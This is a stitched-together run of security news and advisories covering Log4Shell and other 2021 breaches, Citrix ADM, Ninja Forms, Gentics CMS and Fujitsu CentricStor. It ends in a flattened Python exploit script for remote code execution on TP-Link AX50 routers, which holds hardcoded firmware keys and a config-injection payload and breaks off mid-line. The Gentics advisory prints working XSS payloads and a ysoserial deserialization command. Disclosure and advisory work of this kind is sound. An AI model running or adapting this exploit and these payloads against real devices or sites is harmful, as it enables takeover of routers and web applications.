In this post, we break down 5 times hackers used security vulnerabilities in 2021 to attack governments and businesses.
The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.

Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit.

According to research by BetterCloud, the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.

Coupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it’s not surprising that businesses and governments are struggling to keep up with the volume of security vulnerabilities and patches.

And lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit multiple security vulnerabilities in 2021.

In this post, we’ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.

**1.   APT41 exploits Log4Shell vulnerability to compromise at least two US state governments**

First publicly announced in early December 2021, Log4shell (CVE-2021-44228) is a critical security vulnerability in the popular Java library Apache Log4j 2. The vulnerability is simple to execute and enables attackers to perform remote code execution.

A patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it — and at least one of them was successful.

Shortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from Mandiant. Once they gained access to internet-facing systems, APT41 began a months-long campaign of reconnaissance and credential harvesting.

**2.  North Korean government backed-groups exploit Chrome zero-day vulnerability**

On February 10 2022, Google’s Threat Analysis Group (TAG) discovered that two North Korean government backed-groups exploited a vulnerability (**CVE-2022-0609**) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.

The activities of the two groups have been tracked as Operation Dream Job and AppleJeus, and both of them used the same exploit kit to collect sensitive information from affected systems.

How does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome — which, just like Log4Shell, allows hackers to perform remote code execution.

**3.  Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability**

From September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by exploiting a vulnerability **(CVE-20****2****1-40539)** in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution.

So, what happens after hackers exploited this vulnerability? You guessed it — remote code execution. Specifically, hackers uploaded a payload to a victims network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.

From there, hackers moved laterally to other systems on the network, exfiltrated any files they pleased, and even stole credentials.

**4.  Tallinn-based hacker exploits Estonian government platform security vulnerabilities**

In July 2021, Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia’s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.

To do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person’s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received — and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.

**5.  Russian hackers exploit Kaseya security vulnerabilities**

Kaseya, a Miami-based software company, provides tech services to thousands of businesses over the world — and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: shut down your servers immediately.

The urgency was warranted. Over 1,500 small and midsize businesses had just been attacked, with attackers asking for $70 million in payment.

A Russian-based cybergang known as REvil claimed responsibility for the attack. According to Hunteress Labs, REvil exploited a zero-day (CVE-2021-30116) and performed an authentication bypass in Kaseya’s web interface — allowing them to deploy a ransomware attack on MSPs and their customers.

**Organizations need a streamlined approach to vulnerability assessment**

Hackers took advantage of many security vulnerabilities in 2021 to breach an array of governments and businesses.

As we broke down in this article, hackers can range from individuals to whole state-sponsored groups — and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.

And while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right vulnerability management and patch management, however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.

Want to learn more about different vulnerability and patch management tools? Visit our Vulnerability and Patch Management page or read the solution brief.

Security vulnerabilities: 5 times that organizations got hacked

Improper access control flaw poses DoS-to-RCE hijack risk

John Leyden 20 June 2022 at 15:44 UTC

Improper access control flaw poses DoS-to-RCE hijack risk

Citrix has patched a critical vulnerability in its Application Delivery Management (ADM) technology that, if left unresolved, creates a means for remote attackers to reset admin passwords.

The improper access control vulnerability (CVE-2022-27511) created a risk that a remote, unauthenticated user could not only crash a system via a denial-of-service (DoS) exploit, but go on to reset admin credentials on the next subsequent reboot.

An advisory by Citrix issued last week explains that vulnerability could be abused to trigger the “reset of the administrator password at the next device reboot, allowing an attacker with SSH \[Secure Shell\] access to connect with the default administrator credentials after the device has rebooted”.

**Access granted**

The particulars of the issue turn what would normally be a system corruption problem into a much more severe vulnerability with a severity akin to that posed by an unauthenticated, remote code execution (RCE) flaw.

Another, less severe vulnerability (CVE-2022-27512) creates a means to temporarily disrupt the ADM license service.

All supported versions of Citrix ADM server and Citrix ADM agent are affected by the vulnerabilities, which were both discovered by security researchers from German firm Code White.

Catch up on the latest network security news

Citrix urged enterprise sysadmins to upgrade to the most recent versions of its technology – Citrix ADM 13.1-21.53, Citrix ADM 13.0-85.19, or subsequent releases.

An advisory from the US Cybersecurity and Infrastructure Security Agency warns that an “attacker could exploit these vulnerabilities to take control of an affected system”, emphasizing the seriousness of the potential risk.

The Daily Swig contacted the researchers at Code White, who declined to comment further at this time, adding they had no immediate plans to release any blog post or technical write-up.

Citrix ADM offers a web-based technology for managing Citrix deployment in the cloud or on-premise. Although known for thin client computing, Citrix these days offers a range of networking product that improves the delivery speed and quality of apps served to end users. This functionality is delivered through load balancing and web app acceleration technologies.

YOU MIGHT ALSO LIKE Attackers can use ‘Scroll to Text Fragment’ web browser feature to steal data – research

Critical Citrix ADM vulnerability creates means to reset admin passwords

The Wordfence Threat Intelligence team uncovered a code injection vulnerability that made it possible for unauthenticated attackers to call a limited number of methods in various Ninja Forms classes, including a method that unserialized user-supplied content, resulting in Object Injection. This could allow attackers to execute arbitrary code or delete ar bitrary files on sites where a separate POP chain was present. This flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11.

    On June 16, 2022, the Wordfence Threat Intelligence team noticed a back-ported security update in Ninja Forms, a WordPress plugin with over one million active installations. As with all security updates in WordPress plugins and themes, our team analyzed the plugin to determine the exploitability and severity of the vulnerability that had been patched.We uncovered a code injection vulnerability that made it possible for unauthenticated attackers to call a limited number of methods in various Ninja Forms classes, including a method that unserialized user-supplied content, resulting in Object Injection. This could allow attackers to execute arbitrary code or delete arbitrary files on sites where a separate POP chain was present.There is evidence to suggest that this vulnerability is being actively exploited in the wild, and as such we are alerting our users immediately to the presence of this vulnerability.This flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11.WordPress appears to have performed a forced automatic update for this plugin, so your site may already be using one of the patched version. Nonetheless, we strongly recommend ensuring that your site has been updated to one of the patched versions as soon as possible since automatic updates are not always successful.Wordfence Premium, Wordfence Care, and Wordfence Response customers received a rule on June 16, 2022 to protect against active exploitation of this vulnerability. Wordfence users still using the free version will receive the same protection on July 16, 2022. Regardless of your protection status with Wordfence, you can update the plugin on your site to one of the patched versions to avoid exploitation.Description: Code InjectionAffected Plugin: Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPressPlugin Slug: ninja-formsPlugin Developer: Saturday DriveAffected Versions: 3.6-3.6.10, 3.5-3.5.8.3, 3.4-3.4.34.2, 3.3-3.3.21.3, 3.2-3.2.27, 3.1-3.1.10, 3.0-3.0.34.2CVE ID: PendingCVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HFully Patched Version: 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, 3.6.11Ninja Forms is a popular WordPress plugin designed to enhance WordPress sites with easily customizable forms. One feature of Ninja Forms is the ability to add “Merge Tags” to forms that will auto-populate values from other areas of WordPress like Post IDs and logged in user’s names. Unfortunately, this functionality had a flaw that made it possible to call various Ninja Form classes that could be used for a wide range of exploits targeting vulnerable WordPress sites.Without providing too many details on the vulnerability, the Merge Tag functionality does an is_callable() check on a supplied Merge Tags. and when a callable class and method is supplied as a Merge Tag, the function is called and the code executed. These Merge Tags can be supplied by unauthenticated users due to the way NF_MergeTags_Other class handles Merge Tags.We determined that this could lead to a variety of exploit chains due to the various classes and functions that the Ninja Forms plugin contains. One potentially critical exploit chain in particular involves the use of the NF_Admin_Processes_ImportForm class to achieve remote code execution via deserialization, though there would need to be another plugin or theme installed on the site with a usable gadget.As we learn more about the exploit chains attackers are using to exploit this vulnerability, we will update this post.ConclusionIn today’s post, we detailed a critical vulnerability in Ninja Forms Contact Form which allows unauthenticated attackers to call static methods on a vulnerable site that could be used for the site. This can be used to completely take over a WordPress site. There is evidence to suggest that this vulnerability is being actively exploited.This flaw has been fully patched in versions 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, and 3.6.11. It appears as though WordPress may have performed a forced update so your site may already be on one of the patched versions. Nonetheless, we strongly recommend ensuring that your site has been updated to one of the patched versions as soon as possible.If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that can lead to complete site takeover.Special thanks to Ramuel Gall, a Wordfence Threat Analyst, for his work reverse engineering the vulnerability's patches to develop a working Proof of Concept and for his contributions to this post.

WordPress Ninja Forms Code Injection

Gentics CMS version 5.36.29 suffers from persistent cross site scripting and unsafe java deserialization vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220608-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting & Unsafe Java Deserializiation  
             product: Gentics CMS  
  vulnerable version: 5.36.29, see section below  
       fixed version: 5.40.27, 5.41.15, 5.42.7, 5.43.1 or higher  
          CVE number: CVE-2022-30981, CVE-2022-30982  
              impact: high  
            homepage: https://www.gentics.com/  
               found: 2021-04-02  
                  by: Gerhard Hechenberger (Office Vienna)  
                      Steffen Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"APA-IT Informations Technologie GmbH offers offers support with a focus on  
media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press  
Agency, we are responsible for the IT of the Austrian news agency as well  
as numerous other media enterprises.  
This expertise and insight into the industry make APA-IT an expert for IT  
solutions for publishers and media-related companies. Existing systems and  
tools are constantly developed and tailored to individual customer needs.  
As such, APA-IT is always available – from conception to operation."

Source: https://www.gentics.com/genticscms/company_gentics.en.html

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these products  
conducted by security professionals to identify and resolve all security  
issues.

Vulnerability overview/description:  
-----------------------------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
Multiple cross-site scripting vulnerabilities are present in the application.  
An attacker can store malicious JavaScript code in the username and profile  
description. The code will execute once an admin user hovers over the  
attacker's username. Thus, the attacker can execute code in the context of an  
admin.

2) Unsafe Java Deserialization (CVE-2022-30981)  
The Gentics CMS has an import option which will accept ZIP files. The archive  
includes a Java serialized object that gets deserialized on import. This can  
lead to code execution on the server.  
A low privileged user might be able to exploit this vulnerability by chaining  
it together with vulnerability 1).

Proof of concept:  
-----------------  
1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982)  
To trigger the first XSS, an attacker has to change the profile description to  
include a payload, e.g. "<script>alert(document.domain)</script)". The payload  
will execute once a user with access to the userlist hovers his mouse over the  
profile name. The event "onmouseover" will trigger following code:

JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br>  
<script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' );

The execution of the code leads to following function:

function JSI3_comp_list_401__ass( obj, title, text, assTitle )  
{  
  JSI3_comp_list_401__assReset();  
  clearTimeout( JSI3_comp_list_401___ass_timeout );  
  JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle );  
}

The malicious code, which is contained in the "text" parameter, gets passed  
through to the next function. There it is added to an HTML element and thus  
executed in the browser.

function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) {  
  if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) {  
    JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true;  
    $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:''));  
    $(obj).tipsy({  
      trigger: 'manual',  
      html: true,  
      offset: 3,  
      delayIn: 900,  
      delayOut: 0,  
      opacity: 0.85,  
      gravity: 'nww'  
    });  
  }  
  $(obj).tipsy("show");  
  gcn_active_tipsy = obj;  
}

Another XSS vector can be found in the parameters "First Name" and "Last Name".  
By e.g. changing the last name to 'Node" onload="alert(document.domain)',  
JavaScript code is added to the profile picture that is loaded in the upper  
right corner on every page. The following snippet shows the vulnerable line of  
code:

<div id="profil">  
<div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div>

The third XSS is caused by changing the first and last name into JavaScript  
code without prior encoding. Changing the last name to  
"Last Name'+eval(alert(document.domain))+'" will cause the following code to be  
included in the server's response:

<script language="JavaScript" type="text/javascript">  
  var menus = new Array();  
  var imgs = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array();  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1;  
  menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

2) Unsafe Java Deserialization (CVE-2022-30981)  
First, a malicious ZIP archive needs to be created. The following files will need to  
be included within this archive:

bundlebuild.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<bundlebuild>  
  <bundleinfo>  
    <name><![CDATA[test4]]></name>  
    <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>  
    <description><![CDATA[]]></description>  
    <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>  
    <globalprefix>D77D</globalprefix>  
  </bundleinfo>  
  <builds>  
    <build>  
      <builddate>1618996405</builddate>  
      <changelog><![CDATA[test4]]></changelog>  
      <count>0</count>  
    </build>  
  </builds>  
  <tables>  
  </tables>  
</bundlebuild>

containedobjects.xml:

<?xml version="1.0" encoding="UTF-8"?>  
<objects>  
</objects>

The third file has to be named "serializedjava.bin" and contains the actual  
payload. A demo payload can be generated with following command:  
$ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin

Those three files have to be zipped together into an archive, which can be  
uploaded.

The import feature is available under Enterprise CMS -> Administration ->  
Import and Export. Now select New->Import and upload the malicious ZIP archive.  
Wait until the import completed. Now click on "Test succeeded" in the file  
list. On the new screen select "Start import in background". The payload should  
create a file called "upload_<random_uuid>.tmp" in the folder /tmp. It will  
contain the string "SECTEST".  
Better deserialization chains could be built to reach more interesting targets.  
It is very likely, that RCE could be obtained by writing an own deserialization  
chain.

Vulnerable / tested versions:  
-----------------------------  
The following product version has been tested and found to be vulnerable. Other versions  
are vulnerable as well, please see the vendor's changelog in the solution section.

* Gentics CMS 5.36.29

Vendor contact timeline:  
------------------------  
2022-04-04: Contacting vendor through support@gentics.com  
2022-04-04: Ticket SUP-13323 created.  
2022-04-05: Sent advisory via unencrypted email to provided vendor email address.  
2022-05-04: Updates for Gentics CMS were released on 14th April.  
2022-05-05: Gentics provides us with the fixed version numbers.  
2022-06-08: Release of security advisory.

Solution:  
---------  
Update to versions greater or equal to:  
* 5.40.27 (see https://gentics.com/Content.Node/changelog/5.40.0/5.40.27.html)  
* 5.41.15 (see https://gentics.com/Content.Node/changelog/5.41.0/5.41.15.html)  
* 5.42.7 (see https://gentics.com/Content.Node/changelog/5.42.0/5.42.7.html)  
* 5.43.1 (see https://gentics.com/Content.Node/changelog/5.43.0/5.43.1.html)

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Gerhard Hechenberger, Steffen Robertz / @2022

Gentics CMS 5.36.29 Cross Site Scripting / Deserialization

An issue was discovered on Fujitsu ETERNUS CentricStor CS8000 (Control Center) devices before 8.1A SP02 P04. The vulnerability resides in the grel_finfo function in grel.php. An attacker is able to influence the username (user), password (pw), and file-name (file) parameters and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands.

**Summary**

On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization.

The vulnerability is caused due to a lack of user input validation in two PHP scripts, which are normally included post-authentication. As no include-guards are in-place, an attacker is able to trigger the script without prior authentication by calling it directly.

**Impact**

An attacker is able to take control over the appliance as if they were logged in directly via a secure shell. If exploited, the attacker obtains limited user privileges on the machine as the “www-data” user; however, it should be noted that the Kernel on the system which NCC Group’s Fox-IT encountered is severely outdated, allowing an attacker to easily escalate their privileges to the administrative “root” user of the system.

Due to the sensitive nature of the system, any attacker with full control over the system is potentially able to read, modify and potentially destroy the entire virtual backup tapes, which could be used as an initial stage of a ransomware attack to ensure the victim is not able to recover and is forced to pay the ransom.

The following screenshot shows how NCC Group’s Fox-IT was able to gain remote code execution on the appliance using a custom-built Metasploit\[1\] module:

Figure 1 – Obtaining a Meterpreter\[2\] shell using a custom-built Metasploit module

**Details**

During a recent penetration test at one of NCC Group’s Fox-IT’s clients, a full review was performed of the backup process, as well as any appliances used, as to ensure the company has full system backups in the event of a ransomware breakout. One of the appliances in question was the FUJITSU CentricStor Control Center. Fox-IT requested read-only access to the appliance in order to assess the security of the product.

The web-application used to manage the backups was inspected, which lead NCC Group’s Fox-IT to discover the existence of two scripts, which are accessible by any user on the network and which pass user input directly to the “shell\_exec” and “system” functions.

The two files in questions are as follows:

*   /srv/www/htdocs/custom/library/system/grel.php
*   /srv/www/htdocs/custom/library/system/hw_view.php

**Command injection in grel.php (grelFileInfo)**

The first vulnerability resides in the “grel\_finfo” function in grel.php. An attacker is able to influence the username (“user”), password (“pw”), and file-name (“file”) parameters and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands. The following screenshots show this in more detail:

Figure 2 – The grel\_finfo function is defined and passes the $pw and $user variables directly to the system function call

Figure 3 – The grel\_finfo function is called without any prior authentication

**Command injection in hw\_view.php**

The second vulnerability resides in the "requestTempFile" function in hw_view.php. An attacker is able to influence the “unitName” POST parameter and inject special characters such as semicolons, backticks, or command-substitution sequences in order to force the application to execute arbitrary commands. The following screenshot shows this in more detail:

Figure 4 – The $unitName POST variable is passed directly to the shell\_exec function without prior authentication

**Recommendation**

Upgrade the product to versions v8.1A SP02 P04 or v8.0A SP01. Unfortunately, a dedicated Fujitsu customer request is required to do this due the software distribution model. For more information please contact Fujitsu through their ServiceNow Portal or Support Assistant.

Lastly, block any inbound traffic to port 80 and 443 through the use of a network firewall. Traffic should be selectively allowed only to other instances of the appliance, and only made directly accessible through a management LAN. This ensures attackers are not able to reach the machine without gaining access to this network segment first.

Another temporary measure to secure the application for the time being could be to force the web-interface to bind to the local loopback interface (127.0.0.1) and using a reverse SSH forward to access the service that way. This ensures no attackers are able to reach the web-interface before authenticating over SSH first. Please note that this might void your warranty, as such it is not recommended.

**Vendor Notice**

*   Fujitsu-PSIRT-PSS-IS-2022-050316-Security-Notice-SF.pdf

**Footnotes**

1\. https://en.wikipedia.org/wiki/Metasploit\_Project

2\. https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

3\. https://www.php.net/manual/en/function.escapeshellarg.php

**Published** May 27, 2022June 9, 2022

**Post navigation**

CVE-2022-31795: Technical Advisory – FUJITSU CentricStor Control Center <= V8.1 – Unauthenticated Command Injection

TP-Link AX50 router with firmware 210730 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Tomas Melicher# Technical Details: https://github.com/aaronsvk/CVE-2022-30075# Date: 2022-06-08# Vendor Homepage: https://www.tp-link.com/# Tested On: Tp-Link Archer AX50# Vulnerability Description: Remote Code Execution via importing malicious config file# CVE: CVE-2022-30075#!/usr/bin/python3import argparse # pip install argparseimport requests # pip install requestsimport binascii, base64, os, re, json, sys, time, math, random, hashlibimport tarfile, zlibfrom Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodomefrom Crypto.PublicKey import RSAfrom Crypto.Util.Padding import pad, unpadfrom Crypto.Random import get_random_bytesfrom urllib.parse import urlencodeclass WebClient(object):  def __init__(self, target, password):    self.target = target    self.password = password.encode('utf-8')    self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')    self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.stok = ''    self.session = requests.Session()    data = self.basic_request('/login?form=auth', {'operation':'read'})    if data['success'] != True:      print('[!] unsupported router')      return    self.sign_rsa_n = int(data['data']['key'][0], 16)    self.sign_rsa_e = int(data['data']['key'][1], 16)    self.seq = data['data']['seq']    data = self.basic_request('/login?form=keys', {'operation':'read'})    self.password_rsa_n = int(data['data']['password'][0], 16)    self.password_rsa_e = int(data['data']['password'][1], 16)    self.stok = self.login()  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def rsa_encrypt(self, n, e, plaintext):    public_key = RSA.construct((n, e)).publickey()    encryptor = PKCS1_v1_5.new(public_key)    block_size = int(public_key.n.bit_length()/8) - 11    encrypted_text = ''    for i in range(0, len(plaintext), block_size):      encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()    return encrypted_text  def download_request(self, url, post_data):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)    filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]    if os.path.exists(filepath):      print('[!] can\'t download, file "%s" already exists' % filepath)      return    with open(filepath, 'wb') as f:      for chunk in res.iter_content(chunk_size=4096):        f.write(chunk)    return filepath  def basic_request(self, url, post_data, files_data={}):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)    return json.loads(res.content)  def encrypted_request(self, url, post_data):    serialized_data = urlencode(post_data)    encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))    encrypted_data = base64.b64encode(encrypted_data)    signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))    encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important    if(res.status_code != 200):      print('[!] url "%s" returned unexpected status code'%(url))      return    encrypted_data = json.loads(res.content)    encrypted_data = base64.b64decode(encrypted_data['data'])    data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)    return json.loads(data)  def login(self):    post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}    data = self.encrypted_request('/login?form=login', post_data)    if data['success'] != True:      print('[!] login failed')      return    print('[+] logged in, received token (stok): %s'%(data['data']['stok']))    return data['data']['stok']class BackupParser(object):  def __init__(self, filepath):    self.encrypted_path = os.path.abspath(filepath)    self.decrypted_path = os.path.splitext(filepath)[0]    self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua    self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def encrypt_config(self):    if not os.path.isdir(self.decrypted_path):      print('[!] invalid directory "%s"'%(self.decrypted_path))      return    # encrypt, compress each .xml using zlib and add them to tar archive    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:      for filename in os.listdir(self.decrypted_path):        basename,ext = os.path.splitext(filename)        if ext == '.xml':          xml_path = '%s/%s'%(self.decrypted_path,filename)          bin_path = '%s/%s.bin'%(self.decrypted_path,basename)          with open(xml_path, 'rb') as f:            plaintext = f.read()          if len(plaintext) == 0:            f = open(bin_path, 'w')            f.close()          else:            compressed = zlib.compress(plaintext)            encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)            with open(bin_path, 'wb') as f:              f.write(encrypted)          tar.add(bin_path, os.path.basename(bin_path))          os.unlink(bin_path)    # compress tar archive using zlib and encrypt    with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:      compressed = zlib.compress(f1.read()+f2.read())    encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)    # write into final config file    with open('%s'%(self.encrypted_path), 'wb') as f:      f.write(encrypted)    os.unlink('%s/data.tar'%(self.decrypted_path))  def decrypt_config(self):    if not os.path.isfile(self.encrypted_path):      print('[!] invalid file "%s"'%(self.encrypted_path))      return    # decrypt and decompress config file    with open(self.encrypted_path, 'rb') as f:      decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())    decompressed = zlib.decompress(decrypted)    os.mkdir(self.decrypted_path)    # store decrypted data into files    with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[0:16])    with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[16:])    # untar second part of decrypted data    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:      tar.extractall(path=self.decrypted_path)    # decrypt and decompress each .bin file from tar archive    for filename in os.listdir(self.decrypted_path):      basename,ext = os.path.splitext(filename)      if ext == '.bin':        bin_path = '%s/%s'%(self.decrypted_path,filename)        xml_path = '%s/%s.xml'%(self.decrypted_path,basename)        with open(bin_path, 'rb') as f:          ciphertext = f.read()        os.unlink(bin_path)        if len(ciphertext) == 0:          f = open(xml_path, 'w')          f.close()          continue        decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)        decompressed = zlib.decompress(decrypted)        with open(xml_path, 'wb') as f:          f.write(decompressed)    os.unlink('%s/data.tar'%(self.decrypted_path))  def modify_config(self, command):    xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)    if not os.path.isfile(xml_path):      print('[!] invalid file "%s"'%(xml_path))      return    with open(xml_path, 'r') as f:      xml_content = f.read()    # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script    payload = '<service name="exploit">\n'    payload += '<enabled>on</enabled>\n'    payload += '<update_url>http://127.0.0.1/</update_url>\n'    payload += '<domain>x.example.org</domain>\n'    payload += '<username>X</username>\n'    payload += '<password>X</password>\n'    payload += '<ip_source>script</ip_source>\n'    payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))    payload += '<interface>internet</interface>\n' # not worked for other interfaces    payload += '<retry_interval>5</retry_interval>\n'    payload += '<retry_unit>seconds</retry_unit>\n'    payload += '<retry_times>3</retry_times>\n'    payload += '<check_interval>12</check_interval>\n'    payload += '<check_unit>hours</check_unit>\n'    payload += '<force_interval>30</force_interval>\n'    payload += '<force_unit>days</force_unit>\n'    payload += '</service>\n'    if '<service name="exploit">' in xml_content:      xml_content = 